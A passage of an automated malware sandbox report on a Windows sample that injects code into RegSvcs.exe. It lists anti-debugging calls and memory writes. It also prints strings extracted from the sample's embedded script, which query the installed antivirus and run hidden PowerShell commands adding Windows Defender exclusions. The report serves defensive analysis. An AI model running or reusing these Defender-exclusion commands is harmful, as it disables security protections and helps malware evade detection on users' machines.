                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014303E9 mov eax, dword ptr fs:[00000030h]14_2_014303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014303E9 mov eax, dword ptr fs:[00000030h]14_2_014303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014303E9 mov eax, dword ptr fs:[00000030h]14_2_014303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0143E3F0 mov eax, dword ptr fs:[00000030h]14_2_0143E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0143E3F0 mov eax, dword ptr fs:[00000030h]14_2_0143E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0143E3F0 mov eax, dword ptr fs:[00000030h]14_2_0143E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014563FF mov eax, dword ptr fs:[00000030h]14_2_014563FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141E388 mov eax, dword ptr fs:[00000030h]14_2_0141E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141E388 mov eax, dword ptr fs:[00000030h]14_2_0141E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141E388 mov eax, dword ptr fs:[00000030h]14_2_0141E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144438F mov eax, dword ptr fs:[00000030h]14_2_0144438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144438F mov eax, dword ptr fs:[00000030h]14_2_0144438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01418397 mov eax, dword ptr fs:[00000030h]14_2_01418397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01418397 mov eax, dword ptr fs:[00000030h]14_2_01418397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01418397 mov eax, dword ptr fs:[00000030h]14_2_01418397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A8243 mov eax, dword ptr fs:[00000030h]14_2_014A8243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A8243 mov ecx, dword ptr fs:[00000030h]14_2_014A8243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141A250 mov eax, dword ptr fs:[00000030h]14_2_0141A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F625D mov eax, dword ptr fs:[00000030h]14_2_014F625D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01426259 mov eax, dword ptr fs:[00000030h]14_2_01426259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014DA250 mov eax, dword ptr fs:[00000030h]14_2_014DA250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014DA250 mov eax, dword ptr fs:[00000030h]14_2_014DA250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01424260 mov eax, dword ptr fs:[00000030h]14_2_01424260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01424260 mov eax, dword ptr fs:[00000030h]14_2_01424260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01424260 mov eax, dword ptr fs:[00000030h]14_2_01424260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141826B mov eax, dword ptr fs:[00000030h]14_2_0141826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D0274 mov eax, dword ptr fs:[00000030h]14_2_014D0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D0274 mov eax, dword ptr fs:[00000030h]14_2_014D0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D0274 mov eax, dword ptr fs:[00000030h]14_2_014D0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D0274 mov eax, dword ptr fs:[00000030h]14_2_014D0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D0274 mov eax, dword ptr fs:[00000030h]14_2_014D0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D0274 mov eax, dword ptr fs:[00000030h]14_2_014D0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D0274 mov eax, dword ptr fs:[00000030h]14_2_014D0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D0274 mov eax, dword ptr fs:[00000030h]14_2_014D0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D0274 mov eax, dword ptr fs:[00000030h]14_2_014D0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D0274 mov eax, dword ptr fs:[00000030h]14_2_014D0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D0274 mov eax, dword ptr fs:[00000030h]14_2_014D0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D0274 mov eax, dword ptr fs:[00000030h]14_2_014D0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141823B mov eax, dword ptr fs:[00000030h]14_2_0141823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142A2C3 mov eax, dword ptr fs:[00000030h]14_2_0142A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142A2C3 mov eax, dword ptr fs:[00000030h]14_2_0142A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142A2C3 mov eax, dword ptr fs:[00000030h]14_2_0142A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142A2C3 mov eax, dword ptr fs:[00000030h]14_2_0142A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142A2C3 mov eax, dword ptr fs:[00000030h]14_2_0142A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F62D6 mov eax, dword ptr fs:[00000030h]14_2_014F62D6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014302E1 mov eax, dword ptr fs:[00000030h]14_2_014302E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014302E1 mov eax, dword ptr fs:[00000030h]14_2_014302E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014302E1 mov eax, dword ptr fs:[00000030h]14_2_014302E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145E284 mov eax, dword ptr fs:[00000030h]14_2_0145E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145E284 mov eax, dword ptr fs:[00000030h]14_2_0145E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A0283 mov eax, dword ptr fs:[00000030h]14_2_014A0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A0283 mov eax, dword ptr fs:[00000030h]14_2_014A0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A0283 mov eax, dword ptr fs:[00000030h]14_2_014A0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014302A0 mov eax, dword ptr fs:[00000030h]14_2_014302A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014302A0 mov eax, dword ptr fs:[00000030h]14_2_014302A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B62A0 mov eax, dword ptr fs:[00000030h]14_2_014B62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B62A0 mov ecx, dword ptr fs:[00000030h]14_2_014B62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B62A0 mov eax, dword ptr fs:[00000030h]14_2_014B62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B62A0 mov eax, dword ptr fs:[00000030h]14_2_014B62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B62A0 mov eax, dword ptr fs:[00000030h]14_2_014B62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B62A0 mov eax, dword ptr fs:[00000030h]14_2_014B62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01428550 mov eax, dword ptr fs:[00000030h]14_2_01428550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01428550 mov eax, dword ptr fs:[00000030h]14_2_01428550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145656A mov eax, dword ptr fs:[00000030h]14_2_0145656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145656A mov eax, dword ptr fs:[00000030h]14_2_0145656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145656A mov eax, dword ptr fs:[00000030h]14_2_0145656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B6500 mov eax, dword ptr fs:[00000030h]14_2_014B6500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F4500 mov eax, dword ptr fs:[00000030h]14_2_014F4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F4500 mov eax, dword ptr fs:[00000030h]14_2_014F4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F4500 mov eax, dword ptr fs:[00000030h]14_2_014F4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F4500 mov eax, dword ptr fs:[00000030h]14_2_014F4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F4500 mov eax, dword ptr fs:[00000030h]14_2_014F4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F4500 mov eax, dword ptr fs:[00000030h]14_2_014F4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F4500 mov eax, dword ptr fs:[00000030h]14_2_014F4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430535 mov eax, dword ptr fs:[00000030h]14_2_01430535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430535 mov eax, dword ptr fs:[00000030h]14_2_01430535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430535 mov eax, dword ptr fs:[00000030h]14_2_01430535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430535 mov eax, dword ptr fs:[00000030h]14_2_01430535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430535 mov eax, dword ptr fs:[00000030h]14_2_01430535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430535 mov eax, dword ptr fs:[00000030h]14_2_01430535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144E53E mov eax, dword ptr fs:[00000030h]14_2_0144E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144E53E mov eax, dword ptr fs:[00000030h]14_2_0144E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144E53E mov eax, dword ptr fs:[00000030h]14_2_0144E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144E53E mov eax, dword ptr fs:[00000030h]14_2_0144E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144E53E mov eax, dword ptr fs:[00000030h]14_2_0144E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145E5CF mov eax, dword ptr fs:[00000030h]14_2_0145E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145E5CF mov eax, dword ptr fs:[00000030h]14_2_0145E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014265D0 mov eax, dword ptr fs:[00000030h]14_2_014265D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145A5D0 mov eax, dword ptr fs:[00000030h]14_2_0145A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145A5D0 mov eax, dword ptr fs:[00000030h]14_2_0145A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014225E0 mov eax, dword ptr fs:[00000030h]14_2_014225E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144E5E7 mov eax, dword ptr fs:[00000030h]14_2_0144E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144E5E7 mov eax, dword ptr fs:[00000030h]14_2_0144E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144E5E7 mov eax, dword ptr fs:[00000030h]14_2_0144E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144E5E7 mov eax, dword ptr fs:[00000030h]14_2_0144E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144E5E7 mov eax, dword ptr fs:[00000030h]14_2_0144E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144E5E7 mov eax, dword ptr fs:[00000030h]14_2_0144E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144E5E7 mov eax, dword ptr fs:[00000030h]14_2_0144E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144E5E7 mov eax, dword ptr fs:[00000030h]14_2_0144E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145C5ED mov eax, dword ptr fs:[00000030h]14_2_0145C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145C5ED mov eax, dword ptr fs:[00000030h]14_2_0145C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01422582 mov eax, dword ptr fs:[00000030h]14_2_01422582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01422582 mov ecx, dword ptr fs:[00000030h]14_2_01422582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01454588 mov eax, dword ptr fs:[00000030h]14_2_01454588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145E59C mov eax, dword ptr fs:[00000030h]14_2_0145E59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A05A7 mov eax, dword ptr fs:[00000030h]14_2_014A05A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A05A7 mov eax, dword ptr fs:[00000030h]14_2_014A05A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A05A7 mov eax, dword ptr fs:[00000030h]14_2_014A05A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014445B1 mov eax, dword ptr fs:[00000030h]14_2_014445B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014445B1 mov eax, dword ptr fs:[00000030h]14_2_014445B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145E443 mov eax, dword ptr fs:[00000030h]14_2_0145E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430A5B mov eax, dword ptr fs:[00000030h]14_2_01430A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145CA6F mov eax, dword ptr fs:[00000030h]14_2_0145CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145CA6F mov eax, dword ptr fs:[00000030h]14_2_0145CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145CA6F mov eax, dword ptr fs:[00000030h]14_2_0145CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CEA60 mov eax, dword ptr fs:[00000030h]14_2_014CEA60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0149CA72 mov eax, dword ptr fs:[00000030h]14_2_0149CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0149CA72 mov eax, dword ptr fs:[00000030h]14_2_0149CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014ACA11 mov eax, dword ptr fs:[00000030h]14_2_014ACA11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145CA24 mov eax, dword ptr fs:[00000030h]14_2_0145CA24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144EA2E mov eax, dword ptr fs:[00000030h]14_2_0144EA2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01444A35 mov eax, dword ptr fs:[00000030h]14_2_01444A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01444A35 mov eax, dword ptr fs:[00000030h]14_2_01444A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145CA38 mov eax, dword ptr fs:[00000030h]14_2_0145CA38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01476ACC mov eax, dword ptr fs:[00000030h]14_2_01476ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01476ACC mov eax, dword ptr fs:[00000030h]14_2_01476ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01476ACC mov eax, dword ptr fs:[00000030h]14_2_01476ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01420AD0 mov eax, dword ptr fs:[00000030h]14_2_01420AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01454AD0 mov eax, dword ptr fs:[00000030h]14_2_01454AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01454AD0 mov eax, dword ptr fs:[00000030h]14_2_01454AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145AAEE mov eax, dword ptr fs:[00000030h]14_2_0145AAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145AAEE mov eax, dword ptr fs:[00000030h]14_2_0145AAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142EA80 mov eax, dword ptr fs:[00000030h]14_2_0142EA80
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CC2CE0 GetProcessHeap,0_2_00CC2CE0
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CB6878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CB6878
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CBAAC4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CBAAC4
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CB6A0B SetUnhandledExceptionFilter,0_2_00CB6A0B
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CB5BBF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00CB5BBF
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EB29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00EB29B2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EA0BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00EA0BCF
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EA0D65 SetUnhandledExceptionFilter,8_2_00EA0D65
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EA0FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00EA0FB1

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\ruum\avqj.mp2.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\ruum\avqj.mp2.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\ruum\avqj.mp2.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\ruum\avqj.mp2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\ruum\avqj.mp2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\ruum\avqj.mp2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: BA7008
                Source: C:\Users\user\ruum\avqj.mp2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                Source: C:\Users\user\ruum\avqj.mp2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
                Source: C:\Users\user\ruum\avqj.mp2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1100008
                Source: C:\Users\user\ruum\avqj.mp2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                Source: C:\Users\user\ruum\avqj.mp2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: E54000
                Source: C:\Users\user\ruum\avqj.mp2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                Source: C:\Users\user\ruum\avqj.mp2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
                Source: C:\Users\user\ruum\avqj.mp2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 92F008
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 Code function: 8_2_00EE1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 Code function: 8_2_00E83312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct")
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: for $objantivirusproduct in $colitems
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $usb = $objantivirusproduct.displayname
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: next
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return $usb
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunc ;==>antivirus
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func disabler()
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;if antivirus() = "windows defender" then
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;#requireadmin
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " -command add-mppreference -exclusionpath " & @scriptdir, "", "", @sw_hide)
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'", "", "", @sw_hide)
